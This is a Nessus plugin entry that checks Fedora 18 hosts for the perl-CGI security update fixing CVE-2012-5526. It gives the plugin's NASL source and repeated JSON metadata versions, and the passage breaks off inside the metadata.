ID FEDORA_2012-18362.NASL Type nessus Reporter Tenable Modified 2018-11-28T00:00:00
Description
Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP response headers properly).
Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2012-18362.
#
include("compat.inc");
if (description)
{
script_id(63043);
script_version("1.7");
script_cvs_date("Date: 2018/11/28 22:47:44");
script_cve_id("CVE-2012-5526");
script_bugtraq_id(56562);
script_xref(name:"FEDORA", value:"2012-18362");
script_name(english:"Fedora 18 : perl-CGI-3.51-10.fc18 (2012-18362)");
script_summary(english:"Checks rpm output for the updated package.");
script_set_attribute(
attribute:"synopsis",
value:"The remote Fedora host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP
response headers properly).
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.redhat.com/show_bug.cgi?id=877015"
);
# https://lists.fedoraproject.org/pipermail/package-announce/2012-November/092916.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?b1059841"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected perl-CGI package."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:perl-CGI");
script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:18");
script_set_attribute(attribute:"patch_publication_date", value:"2012/11/17");
script_set_attribute(attribute:"plugin_publication_date", value:"2012/11/26");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Fedora Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^18([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 18.x", "Fedora " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
flag = 0;
if (rpm_check(release:"FC18", reference:"perl-CGI-3.51-10.fc18")) flag++;
if (flag)
{
if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
else security_warning(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "perl-CGI");
}
{"id": "FEDORA_2012-18362.NASL", "bulletinFamily": "scanner", "title": "Fedora 18 : perl-CGI-3.51-10.fc18 (2012-18362)", "description": "Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP response headers properly).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2012-11-26T00:00:00", "modified": "2018-11-28T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=63043", "reporter": "Tenable", "references": ["http://www.nessus.org/u?b1059841", "https://bugzilla.redhat.com/show_bug.cgi?id=877015"], "cvelist": ["CVE-2012-5526"], "type": "nessus", "lastseen": "2019-02-21T01:18:00", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:perl-CGI"], "cvelist": ["CVE-2012-5526"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP response headers properly).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}}, "hash": "e22dc4d59a507eeafa2e2dbb80543a9b2fce820f11323eb967de8f986ba86f41", "hashmap": [{"hash": "87a2a1ee50785ccbe0b1efcc433c1101", "key": "references"}, {"hash": "fdecafbf6ec0ad93e3c0ffd5be6fdde0", "key": "cpe"}, {"hash": "732c700bd9eb065302f4eef5ddfc0be0", "key": "sourceData"}, {"hash": "d1bc6fb76582b66f9ae08987bb75320e", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "99f98fc563764a794a5d08126182521b", "key": "cvelist"}, {"hash": "26769fd423968d45be7383413e2552f1", "key": "cvss"}, {"hash": "d15f270db9ec6a0a4c6e766be0214e5b", "key": "description"}, {"hash": "594208dc69a797a068f0b8b8688d938c", "key": "published"}, {"hash": "460b12446c99e9f96de9e7fe92f5d167", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "bcdfa94b833816dccba2361e0c847368", "key": "href"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "4fadcbb166741cb5e0e1d874f2772fb6", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=63043", "id": "FEDORA_2012-18362.NASL", "lastseen": "2018-11-29T19:42:52", "modified": "2018-11-28T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "63043", "published": "2012-11-26T00:00:00", "references": ["http://www.nessus.org/u?b1059841", "https://bugzilla.redhat.com/show_bug.cgi?id=877015"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-18362.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63043);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/28 22:47:44\");\n\n script_cve_id(\"CVE-2012-5526\");\n script_bugtraq_id(56562);\n script_xref(name:\"FEDORA\", value:\"2012-18362\");\n\n script_name(english:\"Fedora 18 : perl-CGI-3.51-10.fc18 (2012-18362)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP\nresponse headers properly).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=877015\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-November/092916.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b1059841\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl-CGI package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"perl-CGI-3.51-10.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-CGI\");\n}\n", "title": "Fedora 18 : perl-CGI-3.51-10.fc18 (2012-18362)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 5, "lastseen": "2018-11-29T19:42:52"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:perl-CGI"], "cvelist": ["CVE-2012-5526"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP response headers properly).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 3, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}}, "hash": "f8fa1deda455281553dd526eeab86c2245ddf477f84f2d9c99fc18ec125d6af8", "hashmap": [{"hash": "87a2a1ee50785ccbe0b1efcc433c1101", "key": "references"}, {"hash": "fdecafbf6ec0ad93e3c0ffd5be6fdde0", "key": "cpe"}, {"hash": "b7cd04f3186966896c3418b319b9cedc", "key": "sourceData"}, {"hash": "de38caaccc231e6a74b77a602b35db95", "key": "modified"}, {"hash": "d1bc6fb76582b66f9ae08987bb75320e", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "99f98fc563764a794a5d08126182521b", "key": "cvelist"}, {"hash": "d15f270db9ec6a0a4c6e766be0214e5b", "key": "description"}, {"hash": "594208dc69a797a068f0b8b8688d938c", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "bcdfa94b833816dccba2361e0c847368", "key": "href"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "4fadcbb166741cb5e0e1d874f2772fb6", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=63043", "id": "FEDORA_2012-18362.NASL", "lastseen": "2018-08-30T19:55:47", "modified": "2015-10-20T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "63043", "published": "2012-11-26T00:00:00", "references": ["http://www.nessus.org/u?b1059841", "https://bugzilla.redhat.com/show_bug.cgi?id=877015"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-18362.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63043);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/20 22:34:53 $\");\n\n script_cve_id(\"CVE-2012-5526\");\n script_bugtraq_id(56562);\n script_xref(name:\"FEDORA\", value:\"2012-18362\");\n\n script_name(english:\"Fedora 18 : perl-CGI-3.51-10.fc18 (2012-18362)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP\nresponse headers properly).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=877015\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-November/092916.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b1059841\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl-CGI package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"perl-CGI-3.51-10.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-CGI\");\n}\n", "title": "Fedora 18 : perl-CGI-3.51-10.fc18 (2012-18362)", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:55:47"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:perl-CGI"], "cvelist": ["CVE-2012-5526"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP response headers properly).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 2, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}}, "hash": "4c924314cbb90d39acd2a98140634359ee19d252f6267376c68a3595503106c4", "hashmap": [{"hash": "87a2a1ee50785ccbe0b1efcc433c1101", "key": "references"}, {"hash": "fdecafbf6ec0ad93e3c0ffd5be6fdde0", "key": "cpe"}, {"hash": "b7cd04f3186966896c3418b319b9cedc", "key": "sourceData"}, {"hash": "de38caaccc231e6a74b77a602b35db95", "key": "modified"}, {"hash": "d1bc6fb76582b66f9ae08987bb75320e", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "99f98fc563764a794a5d08126182521b", "key": "cvelist"}, {"hash": "26769fd423968d45be7383413e2552f1", "key": "cvss"}, {"hash": "d15f270db9ec6a0a4c6e766be0214e5b", "key": "description"}, {"hash": "594208dc69a797a068f0b8b8688d938c", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "bcdfa94b833816dccba2361e0c847368", "key": "href"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "4fadcbb166741cb5e0e1d874f2772fb6", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=63043", "id": "FEDORA_2012-18362.NASL", "lastseen": "2017-10-29T13:44:35", "modified": "2015-10-20T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "63043", "published": "2012-11-26T00:00:00", "references": ["http://www.nessus.org/u?b1059841", "https://bugzilla.redhat.com/show_bug.cgi?id=877015"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-18362.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63043);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/20 22:34:53 $\");\n\n script_cve_id(\"CVE-2012-5526\");\n script_bugtraq_id(56562);\n script_xref(name:\"FEDORA\", value:\"2012-18362\");\n\n script_name(english:\"Fedora 18 : perl-CGI-3.51-10.fc18 (2012-18362)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP\nresponse headers properly).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=877015\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-November/092916.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b1059841\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl-CGI package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"perl-CGI-3.51-10.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-CGI\");\n}\n", "title": "Fedora 18 : perl-CGI-3.51-10.fc18 (2012-18362)", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-10-29T13:44:35"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:perl-CGI"], "cvelist": ["CVE-2012-5526"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP\nresponse headers properly).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 6, "enchantments": {"dependencies": {"modified": "2019-01-16T20:15:09", "references": [{"idList": ["PERL_ADVISORY3.ASC"], "type": "aix"}, {"idList": ["USN-1643-1"], "type": "ubuntu"}, {"idList": ["CESA-2013:0685"], "type": "centos"}, {"idList": ["SECURITYVULNS:DOC:28787", "SECURITYVULNS:VULN:12731"], "type": "securityvulns"}, {"idList": ["ALAS-2013-177"], "type": "amazon"}, {"idList": ["SUSE-SU-2013:0441-1", "OPENSUSE-SU-2013:0502-1", "SUSE-SU-2013:0442-1", "OPENSUSE-SU-2013:0497-1"], "type": "suse"}, {"idList": ["DEBIAN:DSA-2587-1:C94C7", "DEBIAN:DSA-2586-1:65FFB"], "type": "debian"}, {"idList": ["ELSA-2013-0685"], "type": "oraclelinux"}, {"idList": ["OPENVAS:1361412562310864899", "OPENVAS:1361412562310864933", "OPENVAS:831757", "OPENVAS:1361412562310831757", "OPENVAS:1361412562310892587", "OPENVAS:1361412562310803344", "OPENVAS:1361412562310864929", "OPENVAS:864929", "OPENVAS:803344", "OPENVAS:892587"], "type": "openvas"}, {"idList": ["OPENSUSE-2013-225.NASL", "DEBIAN_DSA-2586.NASL", "MANDRIVA_MDVSA-2012-180.NASL", "FEDORA_2012-19125.NASL", "CENTOS_RHSA-2013-0685.NASL", "FEDORA_2012-18330.NASL", "DEBIAN_DSA-2587.NASL", "SOLARIS11_PERL-512_20131017.NASL", "FEDORA_2012-19282.NASL", "FEDORA_2012-18318.NASL"], "type": "nessus"}, {"idList": ["MSF:EXPLOIT/UNIX/WEBAPP/TWIKI_MAKETEXT"], "type": "metasploit"}, {"idList": ["RHSA-2013:0685", "RHSA-2013:0746"], "type": "redhat"}, {"idList": ["CVE-2012-5526"], "type": "cve"}, {"idList": ["F5:K15867", "SOL15867"], "type": "f5"}]}, "score": {"value": 2.1, "vector": "NONE"}}, "hash": "2dd54fcf08dbe770ff261aecd3a84028e7e2cfa3faa4b817ac1115d5d8a39265", "hashmap": [{"hash": "87a2a1ee50785ccbe0b1efcc433c1101", "key": "references"}, {"hash": "fdecafbf6ec0ad93e3c0ffd5be6fdde0", "key": "cpe"}, {"hash": "732c700bd9eb065302f4eef5ddfc0be0", "key": "sourceData"}, {"hash": "d1bc6fb76582b66f9ae08987bb75320e", "key": "title"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "99f98fc563764a794a5d08126182521b", "key": "cvelist"}, {"hash": "26769fd423968d45be7383413e2552f1", "key": "cvss"}, {"hash": "594208dc69a797a068f0b8b8688d938c", "key": "published"}, {"hash": "460b12446c99e9f96de9e7fe92f5d167", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "bcdfa94b833816dccba2361e0c847368", "key": "href"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "c7159476c57e711450abc85b12091fe2", "key": "description"}, {"hash": "4fadcbb166741cb5e0e1d874f2772fb6", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=63043", "id": "FEDORA_2012-18362.NASL", "lastseen": "2019-01-16T20:15:09", "modified": "2018-11-28T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "63043", "published": "2012-11-26T00:00:00", "references": ["http://www.nessus.org/u?b1059841", "https://bugzilla.redhat.com/show_bug.cgi?id=877015"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-18362.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63043);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/28 22:47:44\");\n\n script_cve_id(\"CVE-2012-5526\");\n script_bugtraq_id(56562);\n script_xref(name:\"FEDORA\", value:\"2012-18362\");\n\n script_name(english:\"Fedora 18 : perl-CGI-3.51-10.fc18 (2012-18362)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix CVE-2012-5526 (escape new-lines in Set-Cookie and P3P HTTP\nresponse headers properly).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=877015\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-November/092916.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b1059841\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the 